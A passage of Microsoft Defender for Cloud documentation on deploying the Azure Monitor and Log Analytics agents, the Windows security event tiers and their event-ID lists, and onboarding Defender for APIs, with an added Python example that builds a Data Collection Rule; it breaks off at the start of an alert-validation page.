Clouds: | Defender profile: ✔ Commercial clouds; ✖ Azure Government, Microsoft Azure operated by 21Vianet. Azure Policy add-on: ✔ Commercial clouds; ✔ Azure Government, Microsoft Azure operated by 21Vianet | Defender extension: ✔ Commercial clouds; ✖ Azure Government, Microsoft Azure operated by 21Vianet. Azure Policy extension for Azure Arc: ✔ Commercial clouds; ✖ Azure Government, Microsoft Azure operated by 21Vianet


Learn more about the roles used to provision Defender for Containers extensions. 


Troubleshooting 


- To identify monitoring agent network requirements, see Troubleshooting monitoring agent network requirements.
- To identify manual onboarding issues, see How to troubleshoot Operations Management Suite onboarding issues.


Next steps 


This page explained what monitoring components are and how to enable them. 


Learn more about: 


- Setting up email notifications for security alerts
- Protecting workloads with the Defender plans


Deploy the Azure Monitor Agent to protect your servers with Microsoft Defender for Cloud


Article · 06/18/2023


To make sure that your server resources are secure, Microsoft Defender for Cloud uses agents installed on your servers to send information about your servers to Microsoft Defender for Cloud for analysis. You can quietly deploy the Azure Monitor Agent on your servers when you enable Defender for Servers.


In this article, we're going to show you how to deploy the agent so that you can protect your servers.


Availability 


Aspect | Details
Release state: | Preview
Relevant Defender plan: | - Security posture management (CSPM) (enabled by default) for Endpoint protection assessment; - Microsoft Defender for Servers Plan 2 for adaptive application controls, fileless attack detection, and file integrity monitoring
Required roles and permissions (subscription-level): | Owner
Supported destinations: | ✔ Azure virtual machines; ✔ Azure Arc-enabled machines
Policy-based: | ✔ Yes
Clouds: | ✔ Commercial clouds; ✖ Azure Government, Azure China 21Vianet

Prerequisites 


Before you deploy AMA with Defender for Cloud, you must have the following prerequisites:


- Make sure your multicloud and on-premises machines have Azure Arc installed:
  - AWS and GCP machines:
    - Onboard your AWS connector and auto provision Azure Arc.
    - Onboard your GCP connector and auto provision Azure Arc.
  - On-premises machines:
    - Install Azure Arc.
- Make sure the Defender plans that you want the Azure Monitor Agent to support are enabled:
  - Enable Defender for Servers Plan 2 on Azure and on-premises VMs
  - Enable Defender plans on the subscriptions for your AWS VMs
  - Enable Defender plans on the subscriptions for your GCP VMs


Deploy the Azure Monitor Agent with Defender for Cloud


To deploy the Azure Monitor Agent with Defender for Cloud: 
1. From Defender for Cloud's menu, open Environment settings. 


2. Select the relevant subscription. 


3. In the Monitoring coverage column of the Defender for Server plan, select 
Settings. 


4. Enable deployment of the Azure Monitor Agent: 




a. For the Log Analytics agent/Azure Monitor Agent, select the On status. 




In the Configuration column, you can see the enabled agent type. When you 
enable Defender plans, Defender for Cloud decides which agent to provision 
based on your environment. In most cases, the default is the Log Analytics 
agent. 


b. For the Log Analytics agent/Azure Monitor Agent, select Edit configuration. 


c. For the Autoprovisioning configuration agent type, select Azure Monitor Agent. 


[Screenshot: Auto-provisioning configuration pane for the Log Analytics agent. Agent type: Log Analytics Agent (Default) or Azure Monitor Agent (Preview), each described as collecting security-related configurations and event logs from the machine and storing the data in your Log Analytics workspace for analysis. Workspace selection: Default workspace(s) or Custom workspace. Security events storage: security events configuration for the Azure Monitor Agent is not available through the Defender for Cloud portal and must be set manually. Notes: "If a VM already has either SCOM or OMS agent installed locally, the Log Analytics agent extension will still be installed and connected to the configured workspace. Any other solutions enabled on the selected workspace will be applied to Azure VMs that are connected to it. For paid solutions, this could result in additional charges. For data privacy considerations, please make sure your selected workspace is in your desired region."]


By default: 


- The Azure Monitor Agent is installed on all existing machines in the selected subscription, and on all new machines created in the subscription.
- The Log Analytics agent isn't uninstalled from machines that already have it installed. You can leave the Log Analytics agent on the machine, or you can manually remove the Log Analytics agent if you don't require it for other protections.
- The agent sends data to the default workspace for the subscription. You can also configure a custom workspace to send data to.
- You can't enable collection of other security events.


Impact of running with both the Log Analytics and Azure Monitor Agents


You can run both the Log Analytics and Azure Monitor Agents on the same machine, but 
you should be aware of these considerations: 


- Certain recommendations or alerts are reported by both agents and appear twice in Defender for Cloud.
- Each machine is billed once in Defender for Cloud, but make sure you track billing of other services connected to the Log Analytics and Azure Monitor, such as the Log Analytics workspace data ingestion.
- Both agents have performance impact on the machine.


When you enable Defender for Servers Plan 2, Defender for Cloud decides which agent 
to provision. In most cases, the default is the Log Analytics agent. 


Learn more about migrating to the Azure Monitor Agent. 


Custom configurations 


Configure custom destination Log Analytics workspace 


When you install the Azure Monitor Agent with autoprovisioning, you can define the 
destination workspace of the installed extensions. By default, the destination is the 
“default workspace” that Defender for Cloud creates for each region in the subscription: 
defaultWorkspace-<subscriptionId>-<regionShortName>. Defender for Cloud 
automatically configures the data collection rules, workspace solution, and other 
extensions for that workspace. 


If you configure a custom Log Analytics workspace: 


- Defender for Cloud only configures the data collection rules and other extensions for the custom workspace. You have to configure the workspace solution on the custom workspace.
- Machines with the Log Analytics agent that report to a Log Analytics workspace with the security solution are billed even when the Defender for Servers plan isn't enabled. Machines with the Azure Monitor Agent are billed only when the plan is enabled on the subscription. The security solution is still required on the workspace to work with the plan's features and to be eligible for the 500-MB benefit.


To configure a custom destination workspace for the Azure Monitor Agent: 
1. From Defender for Cloud's menu, open Environment settings. 


2. Select the relevant subscription. 


3. In the Monitoring coverage column of the Defender for Server plan, select 
Settings. 


[Screenshot: Settings | Defender plans page for the subscription, showing the Monitoring coverage column and the Settings link of the Defender for Servers plan. The page notes that selecting Save enables Defender for Cloud's enhanced security features on all selected resource types, that the first 30 days are free, and that pricing details are on the pricing page.]


4. For the Log Analytics agent/Azure Monitor Agent, select Edit configuration. 


[Screenshot: Settings & monitoring page listing the components Log Analytics agent/Azure Monitor Agent, Vulnerability assessment for machines and Agentless scanning for machines, each with its description, status and configuration options. The page notes that an enabled extension is installed on any new or existing resource by assigning a security policy.]


5. Select Custom workspace, and select the workspace that you want to send data to. 


[Screenshot: Auto-provisioning configuration pane for the Log Analytics agent, with the Agent type options Log Analytics Agent (Default) and Azure Monitor Agent (Preview), a Workspace selection field and a Security events storage field. The pane notes that a custom workspace must have the relevant solutions enabled, that security events configuration for the Azure Monitor Agent is not available through the portal and must be set manually, that the agent extension is still installed alongside an existing SCOM or OMS agent, that other solutions enabled on the selected workspace (including paid ones) apply to connected VMs, and that the workspace should be in the desired region for data privacy.]


Log Analytics workspace solutions


The Azure Monitor Agent requires Log Analytics workspace solutions. These solutions
are automatically installed when you autoprovision the Azure Monitor Agent with the
default workspace.


The required Log Analytics workspace solutions for the data that you're collecting are: 


• Security posture management (CSPM) — SecurityCenterFree solution

• Defender for Servers Plan 2 — Security solution


Other extensions for Defender for Cloud 


The Azure Monitor Agent requires more extensions. The ASA extension, which supports 
endpoint protection recommendations, fileless attack detection, and Adaptive 
Application controls, is automatically installed when you autoprovision the Azure 
Monitor Agent. 


Other security events collection 


When you autoprovision the Log Analytics agent in Defender for Cloud, you can choose 
to collect other security events to the workspace. When you autoprovision the Azure 
Monitor agent in Defender for Cloud, the option to collect other security events to the 
workspace isn't available. Defender for Cloud doesn't rely on these security events, but 
they can be helpful for investigations through Microsoft Sentinel. 


If you want to collect security events when you autoprovision the Azure Monitor Agent,
you can create a Data Collection Rule to collect the required events. Learn how to do it
with PowerShell or with Azure Policy.


As with Log Analytics workspaces, Defender for Cloud users are eligible for 500 MB of
free data daily on defined data types that include security events.


Next steps 


Now that you enabled the Azure Monitor Agent, check out the features that are 
supported by the agent: 


• Endpoint protection assessment

• Adaptive application controls

• Fileless attack detection

• File Integrity Monitoring


Collect data from your workloads with the Log Analytics agent


Article * 07/31/2023 


Configure the Log Analytics agent and workspaces 


When the Log Analytics agent is on, Defender for Cloud deploys the agent on all supported Azure VMs and 
any new ones created. For the list of supported platforms, see Supported platforms in Microsoft Defender for 
Cloud. 


To configure integration with the Log Analytics agent: 
1. From Defender for Cloud's menu, open Environment settings. 
2. Select the relevant subscription. 
3. In the Monitoring Coverage column of the Defender plans, select Settings. 


4. From the configuration options pane, define the workspace to use. 


[Screenshot: Agent deployment configuration pane for the Log Analytics agent for virtual machines. Under Workspace configuration you can connect Azure VMs to the default workspace(s) created by Microsoft Defender for Cloud or to a different workspace selected from a dropdown. Under Store additional raw data - Windows security events you choose the level of data to store: All Events (all Windows security and AppLocker events), Common (a standard set of events for auditing purposes), Minimal (a small set of events that might indicate potential threats, without a full audit trail) or None (no security or AppLocker events). Charges apply for all settings other than None.]


• Connect Azure VMs to the default workspaces created by Defender for Cloud - Defender for
Cloud creates a new resource group and default workspace in the same geolocation, and connects
the agent to that workspace. If a subscription contains VMs from multiple geolocations, Defender
for Cloud creates multiple workspaces to ensure compliance with data privacy requirements.


The naming convention for the workspace and resource group is: 
o Workspace: DefaultWorkspace-[subscription-ID]-[geo] 
o Resource Group: DefaultResourceGroup-[geo] 


A Defender for Cloud solution is automatically enabled on the workspace per the pricing tier set 
for the subscription. 


Tip


For questions regarding default workspaces, see:
o Am I billed for Azure Monitor logs on the workspaces created by Defender for Cloud?
o Where is the default Log Analytics workspace created?
o Can I delete the default workspaces created by Defender for Cloud?


• Connect Azure VMs to a different workspace - From the dropdown list, select the workspace to
store collected data. The dropdown list includes all workspaces across all of your subscriptions. You
can use this option to collect data from virtual machines running in different subscriptions and
store it all in your selected workspace.


If you already have an existing Log Analytics workspace, you might want to use the same 
workspace (requires read and write permissions on the workspace). This option is useful if you're 
using a centralized workspace in your organization and want to use it for security data collection. 
Learn more in Manage access to log data and workspaces in Azure Monitor. 


If your selected workspace already has a "Security" or "SecurityCenterFree" solution enabled, the
pricing will be set automatically. If not, install a Defender for Cloud solution on the workspace:

a. From Defender for Cloud's menu, open Environment settings. 

b. Select the workspace to which you'll be connecting the agents. 

c. Set Security posture management to on or select Enable all to turn all Microsoft Defender plans 
on. 


5. From the Windows security events configuration, select the amount of raw event data to store: 


• None - Disable security event storage. (Default)

• Minimal - A small set of events for when you want to minimize the event volume.

• Common - A set of events that satisfies most customers and provides a full audit trail.

• All events - For customers who want to make sure all events are stored.


Tip


To set these options at the workspace level, see Setting the security event option at the
workspace level.


For more information about these options, see Windows security event options for the Log Analytics
agent.


6. Select Apply in the configuration pane. 


Windows security event options for the Log Analytics agent


When you select a data collection tier in Microsoft Defender for Cloud, the security events of the selected tier 
are stored in your Log Analytics workspace so that you can investigate, search, and audit the events in your 
workspace. The Log Analytics agent also collects and analyzes the security events required for Defender for 
Cloud's threat protection. 


Requirements 


The enhanced security protections of Defender for Cloud are required for storing Windows security event 
data. Learn more about the enhanced protection plans. 


You may be charged for storing data in Log Analytics. For more information, see the pricing page.


Information for Microsoft Sentinel users 


Security events collection within the context of a single workspace can be configured from either Microsoft 
Defender for Cloud or Microsoft Sentinel, but not both. If you want to add Microsoft Sentinel to a workspace 
that already gets alerts from Microsoft Defender for Cloud and to collect Security Events, you can either: 


• Leave the Security Events collection in Microsoft Defender for Cloud as is. You'll be able to query and
analyze these events in both Microsoft Sentinel and Defender for Cloud. If you want to monitor the
connector's connectivity status or change its configuration in Microsoft Sentinel, consider the second
option.

• Disable Security Events collection in Microsoft Defender for Cloud and then add the Security Events
connector in Microsoft Sentinel. You'll be able to query and analyze events in both Microsoft Sentinel
and Defender for Cloud, but you'll also be able to monitor the connector's connectivity status or change
its configuration in - and only in - Microsoft Sentinel. To disable Security Events collection in Defender
for Cloud, set Windows security events to None in the configuration of your Log Analytics agent.


What event types are stored for "Common" and "Minimal"? 


The Common and Minimal event sets were designed to address typical scenarios based on customer and 
industry standards for the unfiltered frequency of each event and their usage. 


• Minimal - This set is intended to cover only events that might indicate a successful breach and
important events with low volume. Most of the data volume of this set is successful user logon (event ID
4624), failed user logon events (event ID 4625), and process creation events (event ID 4688). Sign out
events are important for auditing only and have relatively high volume, so they aren't included in this
event set.

• Common - This set is intended to provide a full user audit trail, including events with low volume. For
example, this set contains both user logon events (event ID 4624) and user logoff events (event ID
4634). We include auditing actions like security group changes, key domain controller Kerberos
operations, and other events that are recommended by industry organizations.


Here's a complete breakdown of the Security and AppLocker event IDs for each set:


Data tier: Minimal
Collected event indicators: 1102,4624,4625,4657,4663,4688,4700,4702,4719,4720,4722,4723,4724,4727,4728,4732,4735,4737,4739,4740,4754,4755,
4756,4767,4799,4825,4946,4948,4956,5024,5033,8001,8002,8003,8004,8005,8006,8007,8222

Data tier: Common
Collected event indicators: 1,299,300,324,340,403,404,410,411,412,413,431,500,501,1100,1102,1107,1108,4608,4610,4611,4614,4622,
4624,4625,4634,4647,4648,4649,4657,4661,4662,4663,4665,4666,4667,4688,4670,4672,4673,4674,4675,4689,4697,
4700,4702,4704,4705,4716,4717,4718,4719,4720,4722,4723,4724,4725,4726,4727,4728,4729,4733,4732,4735,4737,
4738,4739,4740,4742,4744,4745,4746,4750,4751,4752,4754,4755,4756,4757,4760,4761,4762,4764,4767,4768,4771,
4774,4778,4779,4781,4793,4797,4798,4799,4800,4801,4802,4803,4825,4826,4870,4886,4887,4888,4893,4898,4902,
4904,4905,4907,4931,4932,4933,4946,4948,4956,4985,5024,5033,5059,5136,5137,5140,5145,5632,6144,6145,6272,
6273,6278,6416,6423,6424,8001,8002,8003,8004,8005,8006,8007,8222,26401,30004
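The two passages above, creating a Data Collection Rule so the Azure Monitor Agent collects security events, and the Minimal and Common event-ID sets, are combined here in one added Python example that is not part of this documentation: it turns a tier's event IDs into the XPath filters and the Microsoft.Insights/dataCollectionRules request body that deliver them to a Log Analytics workspace. The workspace resource ID is a placeholder, and the routing of AppLocker IDs 8001-8007 to their own event channels is an assumption.

```python
"""Build an Azure Monitor Data Collection Rule (DCR) body that collects the Windows
security events of a Defender for Cloud data tier ("Minimal" or "Common") through
the Azure Monitor Agent. Constructed example for this page, not Microsoft's code."""
import json

# Event IDs per tier, copied from the data-tier table on this page.
MINIMAL_EVENT_IDS = [
    1102, 4624, 4625, 4657, 4663, 4688, 4700, 4702, 4719, 4720, 4722, 4723,
    4724, 4727, 4728, 4732, 4735, 4737, 4739, 4740, 4754, 4755, 4756, 4767,
    4799, 4825, 4946, 4948, 4956, 5024, 5033, 8001, 8002, 8003, 8004, 8005,
    8006, 8007, 8222,
]
COMMON_EVENT_IDS = [
    1, 299, 300, 324, 340, 403, 404, 410, 411, 412, 413, 431, 500, 501, 1100,
    1102, 1107, 1108, 4608, 4610, 4611, 4614, 4622, 4624, 4625, 4634, 4647,
    4648, 4649, 4657, 4661, 4662, 4663, 4665, 4666, 4667, 4688, 4670, 4672,
    4673, 4674, 4675, 4689, 4697, 4700, 4702, 4704, 4705, 4716, 4717, 4718,
    4719, 4720, 4722, 4723, 4724, 4725, 4726, 4727, 4728, 4729, 4733, 4732,
    4735, 4737, 4738, 4739, 4740, 4742, 4744, 4745, 4746, 4750, 4751, 4752,
    4754, 4755, 4756, 4757, 4760, 4761, 4762, 4764, 4767, 4768, 4771, 4774,
    4778, 4779, 4781, 4793, 4797, 4798, 4799, 4800, 4801, 4802, 4803, 4825,
    4826, 4870, 4886, 4887, 4888, 4893, 4898, 4902, 4904, 4905, 4907, 4931,
    4932, 4933, 4946, 4948, 4956, 4985, 5024, 5033, 5059, 5136, 5137, 5140,
    5145, 5632, 6144, 6145, 6272, 6273, 6278, 6416, 6423, 6424, 8001, 8002,
    8003, 8004, 8005, 8006, 8007, 8222, 26401, 30004,
]
TIERS = {"Minimal": MINIMAL_EVENT_IDS, "Common": COMMON_EVENT_IDS}

# Assumption: AppLocker writes 8001-8004 to its "EXE and DLL" channel and 8005-8007
# to "MSI and Script". Any ID not listed here (including 8222) is read from the
# Security log; adjust the map if your environment records those events elsewhere.
APPLOCKER_CHANNELS = {
    "Microsoft-Windows-AppLocker/EXE and DLL": range(8001, 8005),
    "Microsoft-Windows-AppLocker/MSI and Script": range(8005, 8008),
}


def tier_of(event_id):
    """Smallest tier that stores this event ID; None means only 'All events' keeps it."""
    for name in ("Minimal", "Common"):
        if event_id in TIERS[name]:
            return name
    return None


def channel_of(event_id):
    """Event log channel the agent reads this event ID from."""
    for channel, ids in APPLOCKER_CHANNELS.items():
        if event_id in ids:
            return channel
    return "Security"


def xpath_queries(event_ids, chunk_size=20):
    """One '<channel>!*[System[(EventID=a or EventID=b ...)]]' filter per chunk of IDs.
    Chunking keeps each query readable; the size is a choice, not a documented limit."""
    by_channel = {}
    for eid in sorted(set(event_ids)):
        by_channel.setdefault(channel_of(eid), []).append(eid)
    queries = []
    for channel, ids in by_channel.items():
        for start in range(0, len(ids), chunk_size):
            clause = " or ".join(f"EventID={eid}" for eid in ids[start:start + chunk_size])
            queries.append(f"{channel}!*[System[({clause})]]")
    return queries


def build_dcr(tier, workspace_resource_id, location):
    """Request body for a Microsoft.Insights/dataCollectionRules resource."""
    if tier not in TIERS:
        raise ValueError(f"unknown tier {tier!r}; expected one of {sorted(TIERS)}")
    stream = "Microsoft-SecurityEvent"  # the stream that lands in the SecurityEvent table
    return {
        "location": location,
        "properties": {
            "dataSources": {
                "windowsEventLogs": [{
                    "name": f"securityEvents{tier}",
                    "streams": [stream],
                    "xPathQueries": xpath_queries(TIERS[tier]),
                }]
            },
            "destinations": {
                "logAnalytics": [{
                    "name": "defaultWorkspace",
                    "workspaceResourceId": workspace_resource_id,
                }]
            },
            "dataFlows": [{"streams": [stream], "destinations": ["defaultWorkspace"]}],
        },
    }


if __name__ == "__main__":
    # Placeholder resource ID; substitute your own workspace's ID.
    workspace = ("/subscriptions/<subscriptionId>/resourceGroups/<resourceGroup>/providers/"
                 "Microsoft.OperationalInsights/workspaces/<workspaceName>")
    print(json.dumps(build_dcr("Minimal", workspace, "westeurope"), indent=2))
```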


Note


• If you are using Group Policy Object (GPO), it is recommended that you enable audit policies
Process Creation Event 4688 and the CommandLine field inside event 4688. For more information
about Process Creation Event 4688, see Defender for Cloud's common questions. For more
information about these audit policies, see Audit Policy Recommendations.

• To enable data collection for Adaptive application controls, Defender for Cloud configures a local
AppLocker policy in Audit mode to allow all applications. This will cause AppLocker to generate
events which are then collected and leveraged by Defender for Cloud. It is important to note that
this policy will not be configured on any machines on which there is already a configured
AppLocker policy.

• To collect Windows Filtering Platform Event ID 5156, you need to enable Audit Filtering Platform
Connection (Auditpol /set /subcategory:"Filtering Platform Connection" /Success:Enable)


Setting the security event option at the workspace level


You can define the level of security event data to store at the workspace level.

1. From Defender for Cloud's menu in the Azure portal, select Environment settings.

2. Select the relevant workspace. The only data collection events for a workspace are the Windows security
events described on this page.


[Screenshot: Settings | Data collection page of the workspace, with the Store additional raw data - Windows security events options All Events (all Windows security and AppLocker events), Common (a standard set of events for auditing purposes), Minimal (a small set of events that might indicate potential threats, without a full audit trail) and None (no security or AppLocker events). Charges apply for all settings other than None.]


3. Select the amount of raw event data to store and select Save. 


Manual agent provisioning 
To manually install the Log Analytics agent: 
1. In the Azure portal, navigate to the Defender for Cloud's Environment Settings page. 


2. Select the relevant subscription and then select Settings & monitoring. 


3. Turn Log Analytics agent/Azure Monitor Agent Off. 


[Screenshot: Settings & monitoring page for the subscription, listing the Log Analytics agent/Azure Monitor agent component (collects security-related configurations and event logs from the machine and stores them in your Log Analytics workspace) and the Vulnerability assessment for machines component, each with its description and configuration.]


4. Optionally, create a workspace. 


5. Enable Microsoft Defender for Cloud on the workspace on which you're installing the Log Analytics 
agent: 


a. From Defender for Cloud's menu, open Environment settings. 


b. Set the workspace on which you're installing the agent. Make sure the workspace is in the same
subscription you use in Defender for Cloud and that you have read/write permissions for the
workspace.


c. Select one or both of "Servers" or "SQL servers on machines" (Foundational CSPM is the free default),
and then select Save.


[Screenshot: Settings | Defender plans page of the workspace, stating how many Azure and non-Azure resources reporting to the workspace the Microsoft Defender plans apply to, with the Enable all plans option and the per-plan pricing.]


Note


If the workspace already has a Security or SecurityCenterFree solution enabled, the pricing will 
be set automatically. 


6. To deploy agents on new VMs using a Resource Manager template, install the Log Analytics agent: 


• Install the Log Analytics agent for Windows
• Install the Log Analytics agent for Linux


7. To deploy agents on your existing VMs, follow the instructions in Collect data about Azure Virtual 
Machines (the section Collect event and performance data is optional). 


8. To use PowerShell to deploy the agents, use the instructions from the virtual machines documentation: 
• For Windows machines
• For Linux machines


Tip


For more information about onboarding, see Automate onboarding of Microsoft Defender for Cloud 
using PowerShell. 


To turn off monitoring components: 


• Go to the Defender plans, turn off the plan that uses the extension, and select Save.

• For Defender plans that have monitoring settings, go to the settings of the Defender plan, turn off the
extension, and select Save.


Note


• Disabling extensions does not remove the extensions from the affected workloads.

• For information on removing the OMS extension, see How do I remove OMS extensions installed
by Defender for Cloud.


About Microsoft Defender for APIs 
Microsoft Defender for APIs is a plan provided by Microsoft Defender for Cloud that
offers full lifecycle protection, detection, and response coverage for APIs.


Defender for APIs helps you to gain visibility into business-critical APIs. You can 
investigate and improve your API security posture, prioritize vulnerability fixes, and 
quickly detect active real-time threats. 


Important


Defender for APIs is currently in PREVIEW. See the Supplemental Terms of Use for
Microsoft Azure Previews for legal terms that apply to Azure features that are in
beta, preview, or otherwise not yet released into general availability.


Defender for APIs currently provides security for APIs published in Azure API 
Management. Defender for APIs can be onboarded in the Defender for Cloud portal, or 
within the API Management instance in the Azure portal. 


What can I do with Defender for APIs? 


• Inventory: In a single dashboard, get an aggregated view of all managed APIs.

• Security findings: Analyze API security findings, including information about
external, unused, or unauthenticated APIs.

• Security posture: Review and implement security recommendations to improve
API security posture, and harden at-risk surfaces.

• API sensitive data classification: Classify APIs that receive or respond with
sensitive data, to support risk prioritization. Defender for APIs integrates with MIP
Purview, enabling custom data classification and support for sensitivity labels, and
surfaces those classifications in Cloud Security Explorer for end-to-end data security.

• Threat detection: Ingest API traffic and monitor it with runtime anomaly detection,
using machine-learning and rule-based analytics, to detect API security threats,
including the OWASP API Top 10 critical threats.

• Defender CSPM integration: Integrate with Cloud Security Graph and Attack Paths
in Defender Cloud Security Posture Management (CSPM) for API visibility and risk
assessment across your organization.

• Azure API Management integration: With the Defender for APIs plan enabled, you
can receive API security recommendations and alerts in the Azure API
Management portal.

• SIEM integration: Integrate with security information and event management
(SIEM) systems, making it easier for security teams to investigate with existing
threat response workflows. Learn more.


Reviewing API security findings 


Review the inventory and security findings for onboarded APIs in the Defender for Cloud
API Security dashboard. The dashboard shows the number of onboarded devices,
broken down by API collections, endpoints, and Azure API Management services.


[Screenshot: API Security (Preview) dashboard under Workload protections, showing counts of API Collections, API Endpoints and Azure API Management Services, and a table of API collections with the columns Collection name, Base URL, Discovered via, Number of API endpoints, 30 Days unused, Authentication, External traffic observed and Sensitive data endpoints.]


You can drill down into the API collection to review security findings for onboarded API
endpoints.


[Screenshot: API collection details for Base URL https://defenderapidemo.azure-api.net/echo, listing each endpoint with the columns Endpoint name, Endpoint (path and HTTP method), Last called date (UTC), 30 Days unused, Authentication, External traffic observed and Data classifications; endpoints without traffic show Awaiting data.]


API endpoint information includes:


• Endpoint name: The name of the API endpoint/operation as defined in Azure API
Management.

• Endpoint: The URL path of the API endpoint, and the HTTP method.

• Last called date (UTC): The date when API traffic was last observed going to/from the API
endpoint (in UTC time zone).

• 30 days unused: Shows whether API endpoints have received any API call traffic in
the last 30 days. APIs that haven't received any traffic in the last 30 days are
marked as Inactive.

• Authentication: Shows when a monitored API endpoint has no authentication.
Defender for APIs assesses the authentication state using the subscription keys,
JSON web token (JWT), and client certificate configured in Azure API Management.
If none of these authentication mechanisms are present or executed, the API is
marked as unauthenticated.

• External traffic observed date: The date when external API traffic was observed
going to/from the API endpoint.

• Data classification: Classifies API request and response bodies based on data types
defined in MIP Purview or from a Microsoft supported set.


Note


API endpoints that haven't received any traffic since onboarding to Defender for 
APIs display the status Awaiting data in the API dashboard. 


Investigating API recommendations 


Use recommendations to improve your security posture, harden API configurations, 
identify critical API risks, and mitigate issues by risk priority. 


Defender for APIs provides a number of recommendations, including recommendations
to onboard APIs to the Defender for APIs plan, disable and remove unused APIs, and best
practice recommendations for security, authentication, and access control.


Review the recommendations reference. 


Detecting threats 


Defender for APIs monitors runtime traffic and threat intelligence feeds, and issues 
threat detection alerts. API alerts detect the top 10 OWASP API threats, data exfiltration, 
volumetric attacks, anomalous and suspicious API parameters, traffic and IP access 
anomalies, and usage patterns. 


Review the security alerts reference. 


Responding to threats 


Act on alerts to mitigate threats and risk. Defender for Cloud alerts and
recommendations can be exported into SIEM systems such as Microsoft Sentinel, for
investigation within existing threat response workflows for fast and efficient
remediation. Learn more.


Investigating Cloud Security Graph insights 


Cloud Security Graph in the Defender CSPM plan analyses assets and connections across 
your organization, to expose risks, vulnerabilities, and possible lateral movement paths. 


When Defender for APIs is enabled together with the Defender CSPM plan, you can 
use Cloud Security Explorer to proactively and efficiently query your organizational 
information to locate, identify, and remediate API assets, security issues, and risks. 


[Screenshot: Cloud Security Explorer in Microsoft Defender for Cloud.]


Next steps


Review support and prerequisites for Defender for APIs deployment. 


Support and prerequisites for Defender for APIs deployment


Review the requirements on this page before setting up Microsoft Defender for APIs.


Defender for APIs is currently in preview. 


Cloud and region support 


Defender for APIs is in public preview in the Azure commercial cloud, in these regions: 


• Asia (Southeast Asia, East Asia)

• Australia (Australia East, Australia Southeast, Australia Central, Australia Central 2)

• Brazil (Brazil South, Brazil Southeast)

• Canada (Canada Central, Canada East)

• Europe (West Europe, North Europe)

• India (Central India, South India, West India)

• Japan (Japan East, Japan West)

• UK (UK South, UK West)

• US (East US, East US 2, West US, West US 2, West US 3, Central US, North Central
US, South Central US, West Central US, East US 2 EUAP, Central US EUAP)


Review the latest cloud support information for Defender for Cloud plans and features in
the cloud support matrix.


API support 


Feature: API gateways
Availability: Azure API Management. This feature is available in the Premium, Standard, Basic, and
Developer tiers of Azure API Management. Defender for APIs currently doesn't onboard APIs that are
exposed using the API Management self-hosted gateway, or managed using API Management
workspaces.

Feature: API types
Availability: Currently, Defender for APIs discovers and analyzes REST APIs.

Feature: Multi-region support
Availability: Supported. There is currently limited support for API security insights for APIs published in
Azure API Management multi-region deployments. Security insights, including data
classifications, assessments of inactive APIs, unauthenticated APIs, and external
APIs, are limited to API traffic to the primary region (no support for
security insights for secondary regions). All security detections and subsequently
generated security alerts will work for API traffic sent to both primary and
secondary regions.


Defender CSPM integration 


To explore API security risks using Cloud Security Explorer, the Defender Cloud Security
Posture Management (CSPM) plan must be enabled. Learn more.


Onboarding requirements 


Onboarding requirements for Defender for APIs are as follows. 


Requirement: API Management instance
Details: At least one API Management instance in an Azure subscription. Defender for
APIs is enabled at the level of a subscription. One or more supported APIs must be
imported to the API Management instance.

Requirement: Azure account
Details: You need an Azure account to sign in to the Azure portal.

Requirement: Onboarding permissions
Details: To enable and onboard Defender for APIs, you need the Owner or Contributor
role on the Azure subscriptions, resource groups, or Azure API Management
instance that you want to secure. If you don't have the Contributor role, you
need to enable these roles:
- Security Admin role for full access in Defender for Cloud.
- Security Reader role to view inventory and recommendations in Defender for Cloud.

Requirement: Onboarding location
Details: You can enable Defender for APIs in the Defender for Cloud portal, or in the
Azure API Management portal.


Next steps 


Enable and onboard Defender for APIs. 


Protect your APIs with Defender for APIs (Preview)


Defender for APIs in Microsoft Defender for Cloud offers full lifecycle protection,
detection, and response coverage for APIs.


Defender for APIs helps you to gain visibility into business-critical APIs. You can 
investigate and improve your API security posture, prioritize vulnerability fixes, and 
quickly detect active real-time threats. 


Learn more about the Microsoft Defender for APIs plan in the Microsoft Defender for 
Cloud. Defender for APIs is currently in preview. 


Prerequisites 


• You need a Microsoft Azure subscription. If you don't have an Azure subscription,
you can sign up for a free subscription.

• You must enable Microsoft Defender for Cloud on your Azure subscription.

• Review Defender for APIs support, permissions, and requirements before you
begin deployment.

• You enable Defender for APIs at the subscription level.

• Ensure that APIs you want to secure are published in Azure API Management.
Follow these instructions to set up Azure API Management.


Note


This article describes how to enable and onboard the Defender for APIs plan in the
Defender for Cloud portal. Alternately, you can enable Defender for APIs within an
API Management instance in the Azure portal.


Enable the Defender for APIs plan 


1. Sign into the portal”, and in Defender for Cloud, select Environment settings. 


2. Select the subscription that contains the managed APIs that you want to protect. 


3. In the APIs plan, select On. Then select Save. 


[Screenshot: Settings | Defender plans page, with the Cloud Security Posture Management and Cloud Workload Protection (CWP) sections and the APIs plan toggled On.]


4. Select Save. 


Note


After enabling Defender for APIs, onboarded APIs take up to 50 minutes to appear 
in the Recommendations tab. Security insights are available in the Workload 
protections > API security dashboard within 40 minutes of onboarding. 


Onboard APIs 


1. In the Defender for Cloud portal, select Recommendations. 
2. Search for Defender for APIs. 


3. Under Enable enhanced security features, select the security recommendation 
Azure API Management APIs should be onboarded to Defender for APIs. 


[Screenshot: Recommendations page with the Enable enhanced security features security control selected, showing its Not scored status and its completion progress.]


4. In the recommendation page, you can review the recommendation severity,
update interval, description, and remediation steps.


5. Review the resources in scope for the recommendations: 


• Unhealthy resources: Resources that aren't onboarded to Defender for APIs.

• Healthy resources: API resources that are onboarded to Defender for APIs.

• Not applicable resources: API resources that aren't applicable for protection.


6. In Unhealthy resources, select the APIs that you want to protect with Defender for 
APIs. 


7. Select Fix. 


[Screenshot: recommendation "Azure API Management APIs should be onboarded to Defender for APIs", severity High, freshness interval 30 Min, with Unhealthy resources (2), Healthy resources (4) and Not applicable resources (0) tabs]

8. In Fixing resources, review the selected APIs, and select Fix resources.


[Screenshot: Fixing resources pane. By selecting "Fix" on the selected API Collections, these API Collections will be onboarded to Defender for APIs and will be monitored for security coverage.]


9. Verify that remediation was successful. 


[Screenshot: notification "Remediation successful (Azure API Management APIs should be onboarded to Defender for APIs)"]


Track onboarded API resources 


After onboarding the API resources, you can track their status in the Defender for Cloud 
portal > Workload protections > API security. 


Next steps


Review API threats and security posture. 


Validate your Microsoft Defender for APIs alerts


Microsoft Defender for APIs offers full lifecycle protection, detection, and response coverage for APIs that are published in Azure API Management. One of the main capabilities is the ability to detect exploits of the Open Web Application Security Project (OWASP) API Top 10 vulnerabilities through runtime observations of anomalies using machine learning-based and rule-based detections.


This page will walk you through the steps to trigger an alert for one of your API 
endpoints through Defender for APIs. In this scenario, the alert will be for the detection 
